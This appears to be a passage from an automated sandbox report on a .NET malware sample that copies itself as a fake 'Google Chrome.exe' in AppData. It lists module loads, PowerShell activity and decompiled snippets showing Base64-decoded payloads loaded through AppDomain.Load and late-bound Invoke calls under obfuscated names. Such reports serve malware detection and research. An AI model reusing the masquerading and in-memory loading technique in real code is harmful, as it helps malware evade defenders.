            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: ra66DSpa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ra66DSpa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZhGyxoza5P2dhAeTViAGQrQymdI6A.tZKUBmPSSjnMlVusAzaTB164ecu0j,ZhGyxoza5P2dhAeTViAGQrQymdI6A.utkds1sHMa1Xf90VAEG1mg76lXZd4,ZhGyxoza5P2dhAeTViAGQrQymdI6A.O3ztWmSRoMR13IM0UDED6IEl9GkzH,ZhGyxoza5P2dhAeTViAGQrQymdI6A.ZKP3enWbJqPqriGrjZgkATfTb4p5O,cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.VRguJ3EZ1BqVWQd8SJFupxhOdhQuQSrxi79c166A8QhBZ3y1SUqiHy0BNvpA71JfgpCl6VznwERaAvN()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[2],cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.ZiLmvMKpvf7hguVyOJVySj4DJ5SxeCCT83XxkE5VglSiDkarDRNWH66xZFzv4Z8WSODxxQrwLOBoWHE(Convert.FromBase64String(QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZhGyxoza5P2dhAeTViAGQrQymdI6A.tZKUBmPSSjnMlVusAzaTB164ecu0j,ZhGyxoza5P2dhAeTViAGQrQymdI6A.utkds1sHMa1Xf90VAEG1mg76lXZd4,ZhGyxoza5P2dhAeTViAGQrQymdI6A.O3ztWmSRoMR13IM0UDED6IEl9GkzH,ZhGyxoza5P2dhAeTViAGQrQymdI6A.ZKP3enWbJqPqriGrjZgkATfTb4p5O,cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.VRguJ3EZ1BqVWQd8SJFupxhOdhQuQSrxi79c166A8QhBZ3y1SUqiHy0BNvpA71JfgpCl6VznwERaAvN()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[2],cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.ZiLmvMKpvf7hguVyOJVySj4DJ5SxeCCT83XxkE5VglSiDkarDRNWH66xZFzv4Z8WSODxxQrwLOBoWHE(Convert.FromBase64String(QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: pcHmWoBW3GjFu1DUMkppEeaiX6XUR0coTwroZbVE2JqKW90S2RZPxFgYQPfqEc System.AppDomain.Load(byte[])
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: xwTQehdexDAx34zkVQsT2FpirbmUPXFdySq1RtPDpcA2kUDwdx5lZVaQW2X9Ai System.AppDomain.Load(byte[])
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: xwTQehdexDAx34zkVQsT2FpirbmUPXFdySq1RtPDpcA2kUDwdx5lZVaQW2X9Ai
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: pcHmWoBW3GjFu1DUMkppEeaiX6XUR0coTwroZbVE2JqKW90S2RZPxFgYQPfqEc System.AppDomain.Load(byte[])
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: xwTQehdexDAx34zkVQsT2FpirbmUPXFdySq1RtPDpcA2kUDwdx5lZVaQW2X9Ai System.AppDomain.Load(byte[])
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs.Net Code: xwTQehdexDAx34zkVQsT2FpirbmUPXFdySq1RtPDpcA2kUDwdx5lZVaQW2X9Ai
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A00BD pushad ; iretd 0_2_00007FFD348A00C1
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A12FB push ebx; retf 0_2_00007FFD348A132A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3477D2A5 pushad ; iretd 2_2_00007FFD3477D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348900BD pushad ; iretd 2_2_00007FFD348900C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3478D2A5 pushad ; iretd 5_2_00007FFD3478D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A2068 pushad ; retf 5_2_00007FFD348A23F1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A00BD pushad ; iretd 5_2_00007FFD348A00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A09AD push ss; retf 5_2_00007FFD348A09C6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A09C7 push ss; retf 5_2_00007FFD348A09C6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348AC2C5 push ebx; iretd 5_2_00007FFD348AC2DA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD3478D2A5 pushad ; iretd 8_2_00007FFD3478D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348A00BD pushad ; iretd 8_2_00007FFD348A00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348A1A9A push ss; retf 8_2_00007FFD348A1AD6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3478D2A5 pushad ; iretd 10_2_00007FFD3478D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD348A00BD pushad ; iretd 10_2_00007FFD348A00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34971411 pushad ; iretd 10_2_00007FFD34971431
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 17_2_00007FFD348900BD pushad ; iretd 17_2_00007FFD348900C1
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 19_2_00007FFD348900BD pushad ; iretd 19_2_00007FFD348900C1
            Source: ra66DSpa.exe, 6sAiuDc8T0AQjYzDu7FuVJWwqHJQk6KIpuH50uWiNn2idMs6EEe56VRF9zhwI8TvOztJBugbwJwEnSx.csHigh entropy of concatenated method names: 'C8oRXqtUk5Waj1geBhqvbgx6Bh7UE86fnL9iAHrOVLcT4v4ReWBXcGXKSzsbjrgKiKBlDVnXMpHfdyS', '_0Z97MrLIreSE02Sb0HSV2Tg3vjwylcc96AM5JkaINJMMdM9ryk9UETRz0JaNnVdtU8yRgpzobCNy5G9', 'VMqEOdmoATqawDDcZ7KQEVrHGVyatt3ON6MKtcQ0epxmn6OvEeUtcICbFRuQHqQGbuUhpb9GxZTuxkf', 'GPQeCjTKLOYOjqvkClz7NeRLViPgp4LM7UWfAEvnrV5oArJ4Prqwu6cFttbgxE2HsOhhSNu', 'TEzmj5QaAaw1rmMnTcGjLQLsO1OOFuy7ZnPhENjhUWPYkMMidVKaplir5MflxOtIpbkn9qx', 'ytWkQVNMdx2OjnbkwGwsjYFs9LoRE5g9pgoSaVi6IbtZfnXwuxAfEdrAm2thVEs5pB7pdrj', 'kam84myi9sxZfXhtdHmfskwgGOqBpGmK0MagvoCzuEDay4fG1t4PL018bLOPEWfhJ8oVejj', 'thyMUysAxTG0fl50Llxl93FwEZROp9JUxOwAv31Ql4hV7Chv7HNRoSNbDEHKhMCn1keIFjk', 'GBhv6KWGM3gcdFdRcf4yyTydoinEW81OLeyCO4mPkoOdEU7FuMcX7pIjEpj9PBSSEv1yB4t', 'HbwxoGvD4j942Vsbsll01jqzW16x0Gu22FU7WWiV2Iu86pfhCnqNte91BJVs2rg5EIpvArL'
            Source: ra66DSpa.exe, vOFbsYuz9VPub7FI3E7HQpnm2Chg9.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'HtEBbvSlYAhVI7zIdL2v47', '_7pQw0GBCjMo1wdzVGOlQxM', 'WaFQv85q03t08Vh7iNXy76', '_8yqC5Lj43iGp1Mxg1ZGacv'
            Source: ra66DSpa.exe, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.csHigh entropy of concatenated method names: 'VX075nZMdK9OaLwwbmD5fxv7CCVwC2Le0cSZbkSE1GXBExMjUqVcySSslgrjl4', 'J4Gn3IwBd4ZmExBKAeLGfN6qgcMWa0TUjlVjwG2QrQJmQ87qLycDWtzbUIbi7x', 'zEsb7PRwNlRTVWCU4SLhcz86UA7SEYsKDkJ1zIqezOzONnsn5EDpuvLn6EplHN', 'NpDe7SCk402mKTrgqnE6Oun8zaxoVdeZhu8t2M6HqC6k8IieNutl32QXSVp7Dt', 'oCCye1z4hkSmzYlcJKdtJ9zr4YK1O7nVN25SYJnjMnCkdRd2lddlO3C3ffXIak', 'vkOW7zS9dzY3G5L4BJeMwSyHXuUWGE4Hau1YXF77zM3PoMi6LhGdMOQAPgrEKC', 'WtXKhBPZKzBNd6dwo7TvUUdirLIAOcPNDagJZ09ZcAkF54vD9idr0VT8K0YDBO', 'U41y3IrfkE7iNWpeoSbwXKyzERPHxSTDKDiQANadL0VxvCjUb4pQ6lxXFsNup9', 'sl0Zvi94FiGyEue6U1Y8sA6UVbPmYXJK6qnq9YzYLfa9XZV8k4eoSgqz9MhABT', 'oTIV3R6TduVwuwrmWyEdyksiNRiwgzivE3iCY3Gxtq0aGQa8J9j3X3SmvzPtw6'
            Source: ra66DSpa.exe, SMSgUiSVv3VmiBEwi2DMT63wt7smZiXjq0LioRiB1et93rMTrPHdUXWiqvmZhjDIhf9bNc6DkVqdsNh.csHigh entropy of concatenated method names: 'v4ZaC3YJaDnKAcqPNiTDJdisjmBFS5WXPaTQYMgrhJvWXoCRGFJn0zmmzFZySiNVggYJwmsIybD1scs', 'Hpv16SwIQVqRdK6qWRiZ3JQmu3HPFVbNQonGCvL', '_95AMRUssYAYGzjL4LVgehi95RPcWTVVYZxLtBLF', 'zPIPGJ09wvBP5Z8HDKUekK6i2rJWcznxRlXDFka', 'eTo2NrPKUY1QPGmFryFFAGeYxFwk4hyCKps9r1C'
            Source: ra66DSpa.exe, gxVelPSmWHEgdGj0TSDviwCJkIdSq.csHigh entropy of concatenated method names: 'UuyoGAMxy5X1LShR3Vp5N3Lg8Ot8f', 'wTNnjbm4dosdHJ6Wj8w07OOmTZGcp', 'fRPMXtMldfe8W1IQFD4NQSoh1b8gf', 'FdsWqwmX9mP5MXl2fa7W7J0uI1Rvhm9ydiQkumcQYtwJvYePKF1Os6gRx3orBw', '_4XwnGqJMG9DfviIj1jrbf7vMuLpEOm2Ej5QTCYBRLHWsOT7qxqd5fQumDKM61W', 'R6k4ksdcevQhxfnl6og2dN7YPGXvXPablOKAhUNDbSHg2ltruPHwFlidYNzRSu', 'RfNcNaTo7R6KAr4Qrf1J9X', 'o7SERyRBRKbOvOozRX3x8F', 'tg6cKK1YTYGdjNpXh5v4BZ', '_3cu2UNa47DDJ9O9bcKoAc8'
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.csHigh entropy of concatenated method names: 'eKfSIvLNVPlS3ChT0tpFTdrW0dMOPwHgqLoU4kdy6RCEisgxwybcIXGmZyLN7t', 'pcHmWoBW3GjFu1DUMkppEeaiX6XUR0coTwroZbVE2JqKW90S2RZPxFgYQPfqEc', 'UO9dzdpbqbL2ZT2Fns49RE5QogdH4ab8LGxhOV435rawSkpVinsiOR4R3SWMvc', 'aSBRAyHpdNaTBOdvbXg3rAjFrUlvJQ3qq4hv7LMJ8KLFHzbOmbJImTlNMPGmVM', 'jPTgRdypBu1pBpzAekAgSooyNRNHPjQrE4h87PfeSIcT9LGxpJeR9Bod3owQ9R', 'dxO8gQ4NsiLVLpAvYs11Guj6Wag7tBEwp3F1q6gUa5J6pR0CnX60WIy4e3EPlI', 'ZlW8bdapzGNwOhDtTL1G6GYOYnfio06CD1N7YHpwc2JUbKwMGeg88gtlrq3Pi4', 'Tm856ZsdTQgP90WAo0kVcpRBCfmk0MX1fGcBSGiH4spQo0wwlW2Ji4xv55KaBX', 'ptrY1L6Idz32UGpfhjcojN3OMMKojnre0rTTEYHCoexxBGTrtiifcafNP1VTnu', 'g6zcRjuZf48JsGj8dtGClKqn05hvb7ffaiZzmv8Hh8qmprOYZ4mrHN2C58ihy4'
            Source: ra66DSpa.exe, J98X1BFg5gJL3LEHshTwd7ce57sCLsSpHnQqNrNz84Npmlezw2ixv8EEP5lxKEpatP2fuOektELGGi3GtcfrtkZaIfjYLk.csHigh entropy of concatenated method names: 'wZBM5ojQGg2RjahBa0WkrFlLdUlrceKHzCh8k7cn9VhFqGSrOpBb52KtHrihcqLeWB9gTNfWkLbuXDDcZq8qqsINfEOno2', 'wt8jkByqmQcTZ14EKz0D1CJHwfO6sWgoMjwYgBl9X6qFtey5tYJD9hWYzD2etV50MzK8gYiiLOFX7hP97LPWmfBdUvcBVV', '_1Yvd7EP7SB6xtR2aA4XS3q6pEV9psxrWoS51QDeTtLjnW6csAzoFchtQZ0Hy3QALOkJtI85STN8Ikrd8Eg8oRb0GpDudYX', '_2gBhZ5BoLgO7u9tA5Bs1kbvrp5UPsdypzngGLrlO1dQRDxCFsXPJSaa0xACeedejo8MU60z6sAvHris7MZEbzyNfW6IIIu', 'qfgQB4qqEeK9tpNoSXUPndeHk4lXo16H6Knuuy70v9O123Xq3FKSyrgr6f9XnBpU52MMjRwAEDm7DbOWKOfLPxoZ7dYZXF', 'YTM9aN9h740QuL85XhcEiyOeKSEiwEpfDqbftaEUZgdWHI8mB8I28TszOAfkBOwpSDTANckW5pso3Un1inNHIJS9zV4JKl', 'Gxd5xXvz2rvgslCHArV2lXa8jegIsnWSOkAajwjt5VdyIr3I622JavRq7K1Dw27ATUa01rDFh4EAMEFjpccLELbCcEZ7IQ', 'hb6xelOkw13KbjQ9m71WiKLtmvsmR1ST5Bl6Ej1tzVynu5mszrwrNKehECVG6UVK9i48wAvCWoQekcL4wiiXNqT4nxmUPD', 'gpLJRiK9Rfsna9Ipj6kjn3mIDnNYGHmEoNuuhxKpzLY6kiWroTybdagMIZIOpWGqJc8lrFSsqkOndqyPFc9paKtPjYY3n2', 'ZFlK2bqHQgKtiWRVpSD9tlolsspNausjEn9BpNuEIennHCiWaeKnnwHUBz1k96JO7nBXRyKync4TXdGdPYENLFVVOjIcIh'
            Source: ra66DSpa.exe, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.csHigh entropy of concatenated method names: '_1SeOnvg2opDAPsTRUItiyarIPhcivQDw58fw5sIDXHH9hkbVNR6tBJbyrzqoF15r6s39DnPDvVYRZsE', 'GI7actamk5DaZIvBTBSGE6BKt4OMXEURZS1ihUyGCFpREbHt0XLcZKvxYeZj8A28nOsX0h4VUDimPIK', 'fBM7Vf76rL4NxUgLIUcHalZYOfyKuhj7SKCuOpOX0LPwgK3aM7cj4PvORUYAgcubV2jlJefyugaKcv6', 'Q4zTAi9G7jn5vyBK1cmEpk54abk9d2RPMamwhJ5B56XXKAz9xzbuwMKfKW8nUCF1UCYekUp1MzGIDUQ', '_2S8DHJAELWwXKGLXTElV2YhAAWpEnVzn4sj2lK7SSGXtzKKSlQ8eGTAzcBstZbcuY2eMXPCzxx0wQzg', 'vY1LbThbKHuRexLVDjmWCWr8e1Qfxka04LEvgGDhxAxf3rCtUcyYufCk1UQo0fJt6XG1EgX36hTPIdy', 'uOcpFnXWyqtLDFG6xHuQpl4OoKNJNCfSbiJcp7QEcpziaOu32vif4yOca4QiiaGqKgpRuv4DKmi8ZZl', 'A2kpZzLKth0vkyLZawo5qtIB5n0tIE5aZF1YKk4zNcMSYk617daNSvAVNpLIQTC1mLwbNibhrE1x9ug', '_8S4mWXblVKfCSFlBSfxIAkBmCKQ1VhdFzZeS02W1YWpVNxNuKvmsMwHfRMW96JvkG8QVHcNDKiDqFFC', 'htUAjReymaUvK5qkAX1YQxbzo6VvIEqHBKL4iaZPZf9ZzLo8ulBehcqNuervWpzgeNTm0cvvxACqVMA'
            Source: ra66DSpa.exe, EIPsVow9UCeNztykmrhINOiUil0Z52Gi3H9Gbg0oawiqwjz7kGFYijU1XPu2hAqcmAN7jbnGDMeOWHQpPyjCppdxYWrLcF.csHigh entropy of concatenated method names: '_1gfP3s9GmHdjwlxEFWeY7B9aoMNhEANDttTs2tpukKTu4MjJ8sIfETZxRkx1cj62b5Zjnl3GNQDADAiFjNQ9i8EfzMt8lF', '_65xDJzJGgKfGCfbaH8yFcgC9A2PbWh2edZTyiL1v26AyyxvYn685JSiqC7zPYTTQyoMF5otVfxaHtcu', 'bWW5eN9JpyUHVz07OGzHwM2Or9LlpbZXL2gRKfw5Rt9fG2xetFYi4lTqR7JrrQj8u1KIvLz4Tw8ece0', '_7FfoN83I62Qozf5uY6VK5UeISxgSpAQ7bEMgJ317skvbSBxmSnKuqax2XrKwlrRe6QCzyWClxOuW7i7', 'MIzCUJYNn4A5EKsGfaX5PMX1VXDXi9sNMMnCfxq', 'KXJ26WZ2qeMh1dR1og13OPzfRT93uDQDQ3qMB4U', 'iDO0UXmoXeLZce2DSGeFDXveCA9Xh83hKE1uKy4', 'AXx7UD5abpOMxLIMV26D9q45tPPe1CjgXdtS4h5', 'PlcfdaIeVxYZf2VJSRplvYjIE0izEPRoPGHqJ9U', '_6Vpjln0moI6OAarOC7UbjdR3P99tk8UuRThgwH5'
            Source: ra66DSpa.exe, khpJTONaip9rT88b3VfF2YRz7tYSJsVeufU9NBWttPrjMfB7GOKq1mB11RyuI1.csHigh entropy of concatenated method names: 'QN0cTZO60jBqUSOguU6PP3nr0BE9aMV62uvv5wDmbnw2RuMSW98lV9SiTZkF0BQoOp57Tl5Rzll0nnPnYGuDB9v9jpHGb6', 'itYLttotGEqSiKH8z86Oy96Fw8WrbsMDhw1WvDu', 'PUhk1m505bp6HQgHvUorAUwpL5IiXbxWcYveDkr', 'NGBjajTaeK0vlsZi9iSxRBTvZ2g9cSVsCKlW4QJ', 'DJm0WGqaQjKD7TXVer9qVnM0gotGEE06VyYzWCa'
            Source: Google Chrome.exe.0.dr, 6sAiuDc8T0AQjYzDu7FuVJWwqHJQk6KIpuH50uWiNn2idMs6EEe56VRF9zhwI8TvOztJBugbwJwEnSx.csHigh entropy of concatenated method names: 'C8oRXqtUk5Waj1geBhqvbgx6Bh7UE86fnL9iAHrOVLcT4v4ReWBXcGXKSzsbjrgKiKBlDVnXMpHfdyS', '_0Z97MrLIreSE02Sb0HSV2Tg3vjwylcc96AM5JkaINJMMdM9ryk9UETRz0JaNnVdtU8yRgpzobCNy5G9', 'VMqEOdmoATqawDDcZ7KQEVrHGVyatt3ON6MKtcQ0epxmn6OvEeUtcICbFRuQHqQGbuUhpb9GxZTuxkf', 'GPQeCjTKLOYOjqvkClz7NeRLViPgp4LM7UWfAEvnrV5oArJ4Prqwu6cFttbgxE2HsOhhSNu', 'TEzmj5QaAaw1rmMnTcGjLQLsO1OOFuy7ZnPhENjhUWPYkMMidVKaplir5MflxOtIpbkn9qx', 'ytWkQVNMdx2OjnbkwGwsjYFs9LoRE5g9pgoSaVi6IbtZfnXwuxAfEdrAm2thVEs5pB7pdrj', 'kam84myi9sxZfXhtdHmfskwgGOqBpGmK0MagvoCzuEDay4fG1t4PL018bLOPEWfhJ8oVejj', 'thyMUysAxTG0fl50Llxl93FwEZROp9JUxOwAv31Ql4hV7Chv7HNRoSNbDEHKhMCn1keIFjk', 'GBhv6KWGM3gcdFdRcf4yyTydoinEW81OLeyCO4mPkoOdEU7FuMcX7pIjEpj9PBSSEv1yB4t', 'HbwxoGvD4j942Vsbsll01jqzW16x0Gu22FU7WWiV2Iu86pfhCnqNte91BJVs2rg5EIpvArL'
            Source: Google Chrome.exe.0.dr, vOFbsYuz9VPub7FI3E7HQpnm2Chg9.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'HtEBbvSlYAhVI7zIdL2v47', '_7pQw0GBCjMo1wdzVGOlQxM', 'WaFQv85q03t08Vh7iNXy76', '_8yqC5Lj43iGp1Mxg1ZGacv'
            Source: Google Chrome.exe.0.dr, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.csHigh entropy of concatenated method names: 'VX075nZMdK9OaLwwbmD5fxv7CCVwC2Le0cSZbkSE1GXBExMjUqVcySSslgrjl4', 'J4Gn3IwBd4ZmExBKAeLGfN6qgcMWa0TUjlVjwG2QrQJmQ87qLycDWtzbUIbi7x', 'zEsb7PRwNlRTVWCU4SLhcz86UA7SEYsKDkJ1zIqezOzONnsn5EDpuvLn6EplHN', 'NpDe7SCk402mKTrgqnE6Oun8zaxoVdeZhu8t2M6HqC6k8IieNutl32QXSVp7Dt', 'oCCye1z4hkSmzYlcJKdtJ9zr4YK1O7nVN25SYJnjMnCkdRd2lddlO3C3ffXIak', 'vkOW7zS9dzY3G5L4BJeMwSyHXuUWGE4Hau1YXF77zM3PoMi6LhGdMOQAPgrEKC', 'WtXKhBPZKzBNd6dwo7TvUUdirLIAOcPNDagJZ09ZcAkF54vD9idr0VT8K0YDBO', 'U41y3IrfkE7iNWpeoSbwXKyzERPHxSTDKDiQANadL0VxvCjUb4pQ6lxXFsNup9', 'sl0Zvi94FiGyEue6U1Y8sA6UVbPmYXJK6qnq9YzYLfa9XZV8k4eoSgqz9MhABT', 'oTIV3R6TduVwuwrmWyEdyksiNRiwgzivE3iCY3Gxtq0aGQa8J9j3X3SmvzPtw6'
